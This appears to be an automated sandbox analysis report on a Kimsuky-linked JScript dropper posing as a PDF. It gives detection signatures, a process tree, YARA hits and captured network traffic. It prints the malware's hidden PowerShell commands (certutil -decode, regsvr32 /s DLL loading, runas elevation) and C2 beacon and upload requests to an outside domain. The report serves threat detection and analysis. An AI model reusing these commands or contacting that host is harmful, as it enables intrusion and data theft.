Loading ...

Play interactive tourEdit tour

Windows Analysis Report x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Overview

General Information

Sample Name:x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
Analysis ID:1558048
MD5:8b274243a5179028388a2c17c75afb9f
SHA1:d5c09a6fff4dee7dee7f302c1d4d586ba6bc83f2
SHA256:20eff877aeff0afaa8a5d29fe272bdd61e49779b9e308c4a202ad868a901a5cd
Infos:

Most interesting Screenshot:

Detection

Kimsuky
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Kimsuky
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
JavaScript source code contains functionality to generate code involving a shell, file or stream
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses certutil -decode
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains capabilities to detect virtual machines
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64_office
  • wscript.exe (PID: 7044 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • AcroRd32.exe (PID: 3380 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)
      • AcroRd32.exe (PID: 5476 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)
      • RdrCEF.exe (PID: 3972 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 6412 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 5892 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 3812 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 5132 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 6260 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 2764 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
    • powershell.exe (PID: 304 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 1736 cmdline: 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: EB199893441CED4BBBCB547FE411CF2D)
    • powershell.exe (PID: 4168 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • regsvr32.exe (PID: 5280 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: D78B75FC68247E8A63ACBA846182740E)
        • cmd.exe (PID: 4772 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • regsvr32.exe (PID: 5276 cmdline: regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
          • powershell.exe (PID: 5740 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • regsvr32.exe (PID: 2052 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • powershell.exe (PID: 2324 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • regsvr32.exe (PID: 380 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 1328 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
  • 0x1af9e1b:$: VFZxUUFBT

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txtCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x14d:$a1: certutil -decode
  • 0x32b:$a1: certutil -decode
C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x14d:$a1: certutil -decode
  • 0x32b:$a1: certutil -decode

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x1910:$a1: certutil -decode
00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x2b0ee:$a1: certutil -decode
00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x10ee:$a1: certutil -decode
00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x53324:$a1: certutil -decode
  • 0x59f72:$a1: certutil -decode
00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0xa35:$a1: certutil -decode
  • 0xc13:$a1: certutil -decode
Click to see the 46 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
24.2.regsvr32.exe.7ff983d00000.1.unpackJoeSecurity_KimsukyYara detected KimsukyJoe Security
    13.2.regsvr32.exe.7ff983d90000.1.unpackJoeSecurity_KimsukyYara detected KimsukyJoe Security
      19.2.regsvr32.exe.7ff983d00000.1.unpackJoeSecurity_KimsukyYara detected KimsukyJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseVirustotal: Detection: 12%Perma Link
        Multi AV Scanner detection for domain / URLShow sources
        Source: texts.letterpaper.pressVirustotal: Detection: 11%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dllMetadefender: Detection: 29%Perma Link
        Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dllReversingLabs: Detection: 67%
        Source: C:\ProgramData\glK7UwV.pR9aMetadefender: Detection: 29%Perma Link
        Source: C:\ProgramData\glK7UwV.pR9aReversingLabs: Detection: 67%
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D989D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,13_2_00007FF983D989D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3028 CryptImportKey,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,13_2_00007FF983DE3028
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3030 CryptEncrypt,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,13_2_00007FF983DE3030
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D98D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,13_2_00007FF983D98D10
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D089D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,19_2_00007FF983D089D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53028 CryptImportKey,19_2_00007FF983D53028
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53030 CryptEncrypt,19_2_00007FF983D53030
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D08D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,19_2_00007FF983D08D10
        Source: C:\Windows\System32\regsvr32.exeFile opened: z:
        Source: C:\Windows\System32\regsvr32.exeFile opened: x:
        Source: C:\Windows\System32\regsvr32.exeFile opened: v:
        Source: C:\Windows\System32\regsvr32.exeFile opened: t:
        Source: C:\Windows\System32\regsvr32.exeFile opened: r:
        Source: C:\Windows\System32\regsvr32.exeFile opened: p:
        Source: C:\Windows\System32\regsvr32.exeFile opened: n:
        Source: C:\Windows\System32\regsvr32.exeFile opened: l:
        Source: C:\Windows\System32\regsvr32.exeFile opened: j:
        Source: C:\Windows\System32\regsvr32.exeFile opened: h:
        Source: C:\Windows\System32\regsvr32.exeFile opened: f:
        Source: C:\Windows\System32\regsvr32.exeFile opened: d:
        Source: C:\Windows\System32\regsvr32.exeFile opened: b:
        Source: C:\Windows\System32\regsvr32.exeFile opened: y:
        Source: C:\Windows\System32\regsvr32.exeFile opened: w:
        Source: C:\Windows\System32\regsvr32.exeFile opened: u:
        Source: C:\Windows\System32\regsvr32.exeFile opened: s:
        Source: C:\Windows\System32\regsvr32.exeFile opened: q:
        Source: C:\Windows\System32\regsvr32.exeFile opened: o:
        Source: C:\Windows\System32\regsvr32.exeFile opened: m:
        Source: C:\Windows\System32\regsvr32.exeFile opened: k:
        Source: C:\Windows\System32\regsvr32.exeFile opened: i:
        Source: C:\Windows\System32\regsvr32.exeFile opened: g:
        Source: C:\Windows\System32\regsvr32.exeFile opened: e:
        Source: C:\Windows\System32\regsvr32.exeFile opened: c:
        Source: C:\Windows\System32\regsvr32.exeFile opened: a:
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3188 FindFirstFileW,13_2_00007FF983DE3188
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB66E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,13_2_00007FF983DB66E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD84FC FindFirstFileExW,13_2_00007FF983DD84FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB6BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983DB6BB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53188 FindFirstFileW,19_2_00007FF983D53188
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D266E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,19_2_00007FF983D266E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D484FC FindFirstFileExW,19_2_00007FF983D484FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D26BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,19_2_00007FF983D26BB0

        Software Vulnerabilities:

        barindex
        JavaScript source code contains functionality to generate code involving a shell, file or streamShow sources
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseArgument value : ['"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']Go to definition
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseArgument value : ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']Go to definition
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseArgument value : ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"Scripting.FileSystemObject"', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']Go to definition
        Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
        Source: Joe Sandbox ViewIP Address: 50.17.5.224 50.17.5.224
        Source: Joe Sandbox ViewIP Address: 50.17.5.224 50.17.5.224
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=b&p1=8ace1190&p2=c HTTP/1.1Content-Type: multipart/form-data; boundary=--7263b57d61acd27d98a454fc484795fe0106d5Content-Length: 45838User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
